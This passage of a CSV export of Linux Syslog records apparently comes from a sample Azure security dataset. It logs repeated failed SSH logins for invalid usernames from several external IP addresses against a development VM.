+16066,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:32,UbuntuDevEnv,2019-06-26 06:47:31,auth,UbuntuDevEnv,info,Disconnected from invalid user oracle 45.59.69.138 port 50812 [preauth],34219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,oracle,45.59.69.1,50812,,
+16067,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:47:32,UbuntuDevEnv,2019-06-26 06:47:31,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 50812:11: Bye Bye [preauth],34219,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,50812,,
+16068,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:01,UbuntuDevEnv,2019-06-26 06:48:00,auth,UbuntuDevEnv,info,Invalid user geng from 64.202.187.152 port 48476,34330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geng,64.202.187.1,48476,,
+16069,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:01,UbuntuDevEnv,2019-06-26 06:48:00,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,34330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16070,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:01,UbuntuDevEnv,2019-06-26 06:48:00,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16071,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:02,UbuntuDevEnv,2019-06-26 06:48:02,auth,UbuntuDevEnv,info,Failed password for invalid user geng from 64.202.187.152 port 48476 ssh2,34330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geng,64.202.187.1,48476,,
+16072,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:03,UbuntuDevEnv,2019-06-26 06:48:02,auth,UbuntuDevEnv,info,Disconnected from invalid user geng 64.202.187.152 port 48476 [preauth],34330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,geng,64.202.187.1,48476,,
+16073,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:03,UbuntuDevEnv,2019-06-26 06:48:02,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 48476:11: Bye Bye [preauth],34330,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,48476,,
+16074,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:39,UbuntuDevEnv,2019-06-26 06:48:39,auth,UbuntuDevEnv,info,Invalid user discord from 46.101.149.230 port 42496,34454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,discord,46.101.149.2,42496,,
+16075,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:39,UbuntuDevEnv,2019-06-26 06:48:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,34454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16076,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:39,UbuntuDevEnv,2019-06-26 06:48:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16077,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:42,UbuntuDevEnv,2019-06-26 06:48:41,auth,UbuntuDevEnv,info,Failed password for invalid user discord from 46.101.149.230 port 42496 ssh2,34454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,discord,46.101.149.2,42496,,
+16078,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:42,UbuntuDevEnv,2019-06-26 06:48:41,auth,UbuntuDevEnv,info,Received disconnect from 46.101.149.230 port 42496:11: Bye Bye [preauth],34454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,46.101.149.2,42496,,
+16079,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:42,UbuntuDevEnv,2019-06-26 06:48:41,auth,UbuntuDevEnv,info,Disconnected from invalid user discord 46.101.149.230 port 42496 [preauth],34454,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,discord,46.101.149.2,42496,,
+16080,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:56,UbuntuDevEnv,2019-06-26 06:48:56,auth,UbuntuDevEnv,info,Invalid user earthdrilling from 138.68.29.52 port 60548,34523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,138.68.29.5,60548,,
+16081,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:56,UbuntuDevEnv,2019-06-26 06:48:56,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16082,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:56,UbuntuDevEnv,2019-06-26 06:48:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,34523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16083,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:58,UbuntuDevEnv,2019-06-26 06:48:58,auth,UbuntuDevEnv,info,Failed password for invalid user earthdrilling from 138.68.29.52 port 60548 ssh2,34523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,138.68.29.5,60548,,
+16084,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:58,UbuntuDevEnv,2019-06-26 06:48:58,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 60548:11: Bye Bye [preauth],34523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,60548,,
+16085,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:48:58,UbuntuDevEnv,2019-06-26 06:48:58,auth,UbuntuDevEnv,info,Disconnected from invalid user earthdrilling 138.68.29.52 port 60548 [preauth],34523,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,earthdrilling,138.68.29.5,60548,,
+16086,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:03,UbuntuDevEnv,2019-06-26 06:49:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,34570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16087,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:03,UbuntuDevEnv,2019-06-26 06:49:03,auth,UbuntuDevEnv,info,Invalid user wordpress from 45.59.69.138 port 40146,34570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wordpress,45.59.69.1,40146,,
+16088,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:03,UbuntuDevEnv,2019-06-26 06:49:03,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16089,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:05,UbuntuDevEnv,2019-06-26 06:49:05,auth,UbuntuDevEnv,info,Failed password for invalid user wordpress from 45.59.69.138 port 40146 ssh2,34570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wordpress,45.59.69.1,40146,,
+16090,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:05,UbuntuDevEnv,2019-06-26 06:49:05,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 40146:11: Bye Bye [preauth],34570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,40146,,
+16091,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:05,UbuntuDevEnv,2019-06-26 06:49:05,auth,UbuntuDevEnv,info,Disconnected from invalid user wordpress 45.59.69.138 port 40146 [preauth],34570,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wordpress,45.59.69.1,40146,,
+16092,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:12,UbuntuDevEnv,2019-06-26 06:49:12,auth,UbuntuDevEnv,info,Invalid user hang from 139.99.98.248 port 47332,34662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,139.99.98.2,47332,,
+16093,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:12,UbuntuDevEnv,2019-06-26 06:49:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16094,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:12,UbuntuDevEnv,2019-06-26 06:49:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.99.98.248,34662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.99.98.2,,0,
+16095,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:13,UbuntuDevEnv,2019-06-26 06:49:12,auth,UbuntuDevEnv,info,Invalid user nai from 87.101.240.10 port 49054,34664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nai,87.101.240.1,49054,,
+16096,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:13,UbuntuDevEnv,2019-06-26 06:49:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16097,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:13,UbuntuDevEnv,2019-06-26 06:49:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=87.101.240.10,34664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,87.101.240.1,,0,
+16098,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:14,UbuntuDevEnv,2019-06-26 06:49:14,auth,UbuntuDevEnv,info,Failed password for invalid user hang from 139.99.98.248 port 47332 ssh2,34662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,139.99.98.2,47332,,
+16099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:14,UbuntuDevEnv,2019-06-26 06:49:14,auth,UbuntuDevEnv,info,Disconnected from invalid user hang 139.99.98.248 port 47332 [preauth],34662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hang,139.99.98.2,47332,,
+16100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:14,UbuntuDevEnv,2019-06-26 06:49:14,auth,UbuntuDevEnv,info,Received disconnect from 139.99.98.248 port 47332:11: Bye Bye [preauth],34662,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.99.98.2,47332,,
+16101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:15,UbuntuDevEnv,2019-06-26 06:49:14,auth,UbuntuDevEnv,info,Failed password for invalid user nai from 87.101.240.10 port 49054 ssh2,34664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nai,87.101.240.1,49054,,
+16102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:15,UbuntuDevEnv,2019-06-26 06:49:14,auth,UbuntuDevEnv,info,Disconnected from invalid user nai 87.101.240.10 port 49054 [preauth],34664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nai,87.101.240.1,49054,,
+16103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:15,UbuntuDevEnv,2019-06-26 06:49:14,auth,UbuntuDevEnv,info,Received disconnect from 87.101.240.10 port 49054:11: Bye Bye [preauth],34664,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,87.101.240.1,49054,,
+16104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:28,UbuntuDevEnv,2019-06-26 06:49:28,auth,UbuntuDevEnv,info,Invalid user ghm from 64.202.187.152 port 37678,34727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghm,64.202.187.1,37678,,
+16105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:28,UbuntuDevEnv,2019-06-26 06:49:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:28,UbuntuDevEnv,2019-06-26 06:49:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=64.202.187.152,34727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,64.202.187.1,,0,
+16107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:31,UbuntuDevEnv,2019-06-26 06:49:30,auth,UbuntuDevEnv,info,Failed password for invalid user ghm from 64.202.187.152 port 37678 ssh2,34727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghm,64.202.187.1,37678,,
+16108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:31,UbuntuDevEnv,2019-06-26 06:49:30,auth,UbuntuDevEnv,info,Received disconnect from 64.202.187.152 port 37678:11: Bye Bye [preauth],34727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,64.202.187.1,37678,,
+16109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:49:31,UbuntuDevEnv,2019-06-26 06:49:30,auth,UbuntuDevEnv,info,Disconnected from invalid user ghm 64.202.187.152 port 37678 [preauth],34727,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ghm,64.202.187.1,37678,,
+16110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:28,UbuntuDevEnv,2019-06-26 06:50:28,auth,UbuntuDevEnv,info,Invalid user wwwadm from 138.68.29.52 port 49630,34944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wwwadm,138.68.29.5,49630,,
+16111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:28,UbuntuDevEnv,2019-06-26 06:50:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.29.52,34944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,138.68.29.5,,0,
+16112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:28,UbuntuDevEnv,2019-06-26 06:50:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:31,UbuntuDevEnv,2019-06-26 06:50:31,auth,UbuntuDevEnv,info,Failed password for invalid user wwwadm from 138.68.29.52 port 49630 ssh2,34944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wwwadm,138.68.29.5,49630,,
+16114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:31,UbuntuDevEnv,2019-06-26 06:50:31,auth,UbuntuDevEnv,info,Received disconnect from 138.68.29.52 port 49630:11: Bye Bye [preauth],34944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,138.68.29.5,49630,,
+16115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:31,UbuntuDevEnv,2019-06-26 06:50:31,auth,UbuntuDevEnv,info,Disconnected from invalid user wwwadm 138.68.29.52 port 49630 [preauth],34944,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,wwwadm,138.68.29.5,49630,,
+16116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:35,UbuntuDevEnv,2019-06-26 06:50:35,auth,UbuntuDevEnv,info,Invalid user toby from 45.59.69.138 port 57714,34965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toby,45.59.69.1,57714,,from
+16117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:35,UbuntuDevEnv,2019-06-26 06:50:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,34965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:35,UbuntuDevEnv,2019-06-26 06:50:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.59.69.138,34965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.59.69.1,,0,
+16119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:37,UbuntuDevEnv,2019-06-26 06:50:37,auth,UbuntuDevEnv,info,Failed password for invalid user toby from 45.59.69.138 port 57714 ssh2,34965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toby,45.59.69.1,57714,,from
+16120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:38,UbuntuDevEnv,2019-06-26 06:50:37,auth,UbuntuDevEnv,info,Received disconnect from 45.59.69.138 port 57714:11: Bye Bye [preauth],34965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.59.69.1,57714,,
+16121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:38,UbuntuDevEnv,2019-06-26 06:50:37,auth,UbuntuDevEnv,info,Disconnected from invalid user toby 45.59.69.138 port 57714 [preauth],34965,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,toby,45.59.69.1,57714,,
+16122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:48,UbuntuDevEnv,2019-06-26 06:50:47,auth,UbuntuDevEnv,info,Invalid user mysftp from 46.101.149.230 port 59618,35009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysftp,46.101.149.2,59618,,
+16123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:48,UbuntuDevEnv,2019-06-26 06:50:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=46.101.149.230,35009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,46.101.149.2,,0,
+16124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:48,UbuntuDevEnv,2019-06-26 06:50:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,35009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+16125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 06:50:50,UbuntuDevEnv,2019-06-26 06:50:49,auth,UbuntuDevEnv,info,Failed password for invalid user mysftp from 46.101.149.230 port 59618 ssh2,35009,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mysftp,46.101.149.2,59618,,
